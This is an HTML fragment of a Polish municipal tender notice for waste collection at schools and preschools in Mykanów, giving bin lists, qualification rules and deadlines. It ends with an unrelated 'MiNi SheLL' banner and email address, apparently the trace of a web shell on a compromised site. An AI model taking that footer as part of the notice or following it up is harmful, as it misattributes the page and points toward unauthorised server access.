Szkolno-Przedszkolny w Wierzchowisku, Wierzchowisko, ul. Długa 110:<br/>•	pojemniki na odpady zmieszane – cztery pojemniki 1100 l; <br/>•	jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 240 l na odpady segregowane – szkło; <br/>•	jeden pojemnik 1100 l na odpady segregowane – papier;<br/>Ilość wywozów: 12. <br/>8) Zespół Szkolno-Przedszkolny w Mykanowie, Mykanów, ul. Słoneczna 114:<br/>•	pojemniki na odpady zmieszane – cztery po 1100 l; <br/>•	jeden pojemnik 1100 l na odpady segregowane tworzywa sztuczne;<br/>•	jeden pojemnik 240 l na odpady segregowane – szkło; <br/>•	jeden pojemniki 1100 l na odpady segregowane – papier ,<br/>Ilość wywozów: 12. <br/>9) Szkoła Podstawowa im. Jana Brzechwy w Radostkowie, Radostków ul. Szkolna 1:<br/>•	pojemniki na odpady zmieszane – jeden 1100l; <br/>•	jeden pojemnik 240 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 120 l na odpady segregowane – szkło; <br/>•	jeden pojemnik 240 l na odpady segregowane – papier; <br/>•	jeden pojemnik 1100 l na odpady bio;<br/>Ilość wywozów: 12, a pojemnik bio od kwietnia do października – 7 razy.<br/>10) Przedszkole Kuźnica Kiedrzyńska, ul. Witosa 120:<br/>•	pojemniki na odpady zmieszane – dwa 1100 l; <br/>•	jeden pojemnik 1100 l na odpady segregowane – tworzywa sztuczne; <br/>•	jeden pojemnik 1100 l na odpady segregowane – papier,<br/>•	jeden pojemnik 1100 l na odpady bio;<br/> Ilość wywozów: 12, a pojemnik bio od kwietnia do października – 7 razy.<br/> 11) Przedszkole w Starym Cykarzewie, Stary Cykarzew, ul. Szkolna 12 <br/>•	pojemniki na odpady zmieszane – dwa 1100l; <br/>•	jeden pojemniki 120 l na odpady segregowane – tworzywa sztuczne;<br/>•	jeden pojemnik 120 l na odpady segregowane – szkło; <br/>•	jeden pojemnik 120 l na odpady segregowane – papier; <br/>Ilość wywozów: 12. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90000000-7 - Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania i usługi ekologiczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">34928480-6 - Pojemniki i kosze na odpady i śmieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakres usług opisany w Dziale III punkcie 1 i 2 jest wielkością, która będzie wykonywana, a zakres opisany w punkcie 3<br/>może być realizowany alternatywnie, i będzie zlecany na zamówienie. Zamawiający zapłaci Wykonawcy tylko za faktycznie<br/>odebrane w danym miesiącu odpady z poszczególnych obiektów . <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Na podstawie art.112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/> 1.1. zdolności do występowania w obrocie gospodarczym:<br/><br/> Zamawiający nie stawia warunku w tym zakresie<br/><br/> 1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/><br/>Opis sposobu dokonania oceny spełniania warunku:<br/>Wykonawca musi wykazać, że:<br/>- posiada aktualne zezwolenie na transport odpadów objętych przedmiotem zamówienia (tj.15 01 01; 15 01 02; 15 01 04;15 01 05 ;15 01 07; 17 01 01; 17 01 02; 17 01 03; 17 01 07; 17 02 02; 17 06 04; 20 01 01; 20 01 02; 20 01 08; 20 01 21*; 20 01 23*; 20 01 31*, 20 01 33*; 20 01 35*; 20 01 36; 20 01 37*; 20 01 39; 20 01 40; 20 03 01 ; 20 03 07;20 01 99; 20 02 01; 20 01 32; 20 01 34 wydane przez właściwy organ zgodnie z ustawą o odpadach; <br/>- posiada aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu gminy Mykanów;<br/> - wpis w rejestrze BDO – zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach<br/> <br/> 1.3. sytuacji ekonomicznej lub finansowej <br/> Zamawiający nie stawia żadnego warunku<br/> 1.4. zdolności technicznej lub zawodowej<br/> Zamawiający nie stawia żadnego warunku <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów, potwierdzający okoliczności, o których mowa w art. 273 ust.1 ustawy Pzp:<br/> 1) W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć:<br/>- w zakresie transportu odpadów - wpis w rejestrze BDO – zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach <br/>- zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie obioru odpadów komunalnych z terenu gminy Mykanów,<br/>- wpis w rejestrze BDO – zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, w którym mowa w art.125 ust.1 ustawy Pzp. Na potwierdzenie braku podstaw do wykluczenia z art.109 ust.1 pkt.4 ustawy Pzp, zamawiający wymaga przedłożenia odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem<br/>Dokumenty podmiotów zagranicznych:<br/> - Informacja z odpowiedniego rejestru lub inny równoważny dokument, (jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art.108 ust.1 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed złożeniem<br/> - dokument potwierdzający, że nie otwarto jego likwidacji, – jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 3 miesiące przed złożeniem</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Do oferty, w celu wstępnego wykazania spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia, Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1) oświadczenie dotyczące przesłanek wykluczenia z postępowania (oświadczenie należy wypełnić i podpisać przez osoby (osobę) uprawnioną - załącznik nr 2<br/>2) oświadczenie dotyczące spełniania warunków udziału w postępowaniu (oświadczenie wypełnić i podpisać przez osoby (osobę) uprawnioną – załącznik nr 3<br/>3) klauzulę informacyjną RODO - oświadczenie składane na druku oferty<br/>4) pełnomocnictwo z art. 58 ust. 2 ustawy – Pzp (jeśli dotyczy).<br/> Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają pełnomocnictwo do reprezentowania ich zgodnie z art. 58 ust. 2 ustawy Pzp. Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli dokument został sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym poświadczającym zgodność odwzorowania z dokumentem w postaci papierowej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby posiadającej uprawnienia notariusza<br/>5) pełnomocnictwo dla osoby / osób podpisującej ofertę – pełnomocnictwo dla osoby/ osób podpisującej ofertę, jeżeli nie figurują one w odpisie z właściwego rejestru. Pełnomocnictwo powinno być złożone w formie oryginału<br/>6) Wykaz rozwiązań równoważnych – (jeśli dotyczy) wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem i normami. Dokument musi być złożony w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby upoważnionej do reprezentacji.<br/>7) zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji. Nie można zastrzec informacji, o których mowa w art. 222 ust. 5 ustawy Pzp. Jeśli oferta zawiera dokumenty, co do których wykonawca zastrzegł, że nie mogą być ujawnione - wówczas oferta powinna być sporządzona w sposób umożliwiający Zamawiającemu udostępnienie dokumentów (z wyjątkiem określonych w art. 18 ust. 3 ustawy Pzp) wszystkim zainteresowanym. Dokument musi być złożony w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby upoważnionej do reprezentacji<br/>8) zobowiązanie podmiotu udostępniającego zasoby (w przypadku, gdy wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) w takim przypadku należy również złożyć oświadczenie podmiotu udostepniającego o braku podstaw do wykluczenia oraz o spełnieniu warunków <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9) w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcja, spółki cywilne), dokumenty lub oświadczenia potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również podmiot udostepniający swoje zasoby składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć zgodnie z art. 117 ust. 4 ustawy Pzp oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni z nich. Oświadczenie należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym.<br/><br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają pełnomocnictwo do reprezentowania ich zgodnie z art. 58 ust. 2 ustawy Pzp. Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli dokument został sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym poświadczającym zgodność odwzorowania z dokumentem w postaci papierowej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby posiadającej uprawnienia notariusza <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany w Umowie mogą być dokonane za zgodą obu stron, wyrażoną na piśmie, pod rygorem nieważności takich zmian i będą one dopuszczalne wyłącznie w granicach unormowania art. 455 ustawy Prawo zamówień publicznych. <br/>2.	Zamawiający dopuszcza możliwość zmiany ustaleń w umowie w następujących przypadkach:<br/>1)	zmiany warunków oraz uzgodnień koniecznych do realizacji przedmiotu Umowy;<br/>2)	zmiany, których nie można było przewidzieć w chwili zawarcia Umowy, które są konieczne dla prawidłowej realizacji zadania i/lub są korzystne dla Zamawiającego;<br/>3)	zmiany, które spowodują obniżenie kosztów ponoszonych przez Zamawiającego;<br/>4)	zmiany uwarunkowań prawnych i faktycznych realizacji Umowy, spowodowanych działaniem osób trzecich;<br/>5)	zmiany sposobu i terminów wykonania przedmiotu Umowy w przypadku zaistnienia siły wyższej.<br/>3. Zmiany, o których mowa w ust. 2, mogą nastąpić jedynie w uzasadnionych przypadkach, w szczególności:<br/>1)	wystąpienia „siły wyższej”, tj. między innymi katastrofy naturalnej, strajku, pożaru, eksplozji, wojny, ataku terrorystycznego;<br/>2)	zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy;<br/>3)	jeśli rozwiązania zaproponowane przez Zamawiającego lub Wykonawcę przyczynią się do uzyskania wyższej jakości końcowej zamówienia, przy czym zmiana ta nie będzie miała wpływu na wysokość wynagrodzenia Wykonawcy oraz pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego, a Zamawiający wyrazi na nią zgodę.<br/>4.	Umowa może ulec zmianie tylko w zakresie, w jakim okoliczności określone powyżej będą pozostawały w adekwatnym związku przyczynowym z terminem wykonania Umowy, sposobem wykonania Umowy lub wysokością wynagrodzenia Wykonawcy.<br/>5.	Wszelkie zmiany i uzupełnienia treści Umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności, poprzez sporządzenie i podpisanie przez obie Strony aneksu do Umowy, z zastrzeżeniem odmiennych postanowień Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mykanow/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-11 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dodatkowe informacje zawarte są w SWZ i załącznikach

Creat By MiNi SheLL
Email: jattceo@gmail.com